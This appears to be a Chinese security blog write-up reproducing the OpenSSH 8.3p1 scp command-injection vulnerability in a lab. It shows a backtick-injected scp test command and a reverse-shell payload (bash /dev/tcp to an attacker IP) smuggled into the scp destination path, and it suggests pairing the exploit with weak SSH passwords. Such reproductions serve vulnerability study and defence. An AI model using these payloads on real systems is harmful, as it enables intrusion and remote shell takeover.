OpenSSH操作系统命令注入


简述

​ OpenSSH 8.3p1及以前版本中的scp容许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。目前绝大多数linux系统受影响。

0x01 漏洞原理

​ 当执行本地scp命令时,scp不会检查、过滤和清除文件名。这使得攻击者执行带有反引号的有效scp命令时,本地shell还将执行反引号中的命令。

0x02 影响版本

OpenSSH <= 8.3p1

需要知道ssh密码(真实环境中可以配合ssh弱口令使用)

0x03 漏洞复现

1.环境启动

环境效果:禁用了ssh连接,但可以使用scp

攻击机1:centos7.6 192.168.80.110

攻击机2:kali 192.168.80.102

靶机:ubuntu20 192.168.80.135

2.漏洞测试

查看靶机ssh版本

img

Centos7上创建123.txt

img

利用SCP复制123.txt到/tmp目录下

利用scp创建test.txt空文件在/tmp目录下

scp 123.txt root@192.168.80.132:'`touch /tmp/test.txt` /tmp'

image-20230606164116788

如果漏洞存在那我们就把123.txt从kali传到了ubuntu,并在ubuntu创建了一个test.txt的文件

操作成功,漏洞存在

img

3.反弹shell

scp test.txt root@192.168.80.135:'`bash -i >& /dev/tcp/192.168.80.102/4444 0>&1`/tmp/test123.txt'

img

成功反弹shell

img

总结

此漏洞虽然利用很简单,但局限性很大,需要ssh的密码,在测试过程中通常可以配合ssh弱口令一起使用,或者在得知ssh密码的情况下进行使用,这样就可进行反弹shell获取权限了。


文章作者: Captured
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Captured !
评论
 上一篇
社工钓鱼基本流程 社工钓鱼基本流程
穷则社工钓鱼,达则0day炸场-微步在线,借用微步公众号的一句话,没有后端资源支持的情况下,社工钓鱼必学技能,毕竟正面打不动,代码审不动,0day又没有是日常,下文讲解自己对于社工钓鱼的思路。
2023-10-08
下一篇 
宝塔面板RCE漏洞复现 宝塔面板RCE漏洞复现
该RCE与历史漏洞相似,同样是XSS到RCE,漏洞已在最新版7.9.3修复,漏洞影响范围<7.9.2,修复方式就是把版本直接更新到最新版7.9.3以上即可
2023-03-06
  目录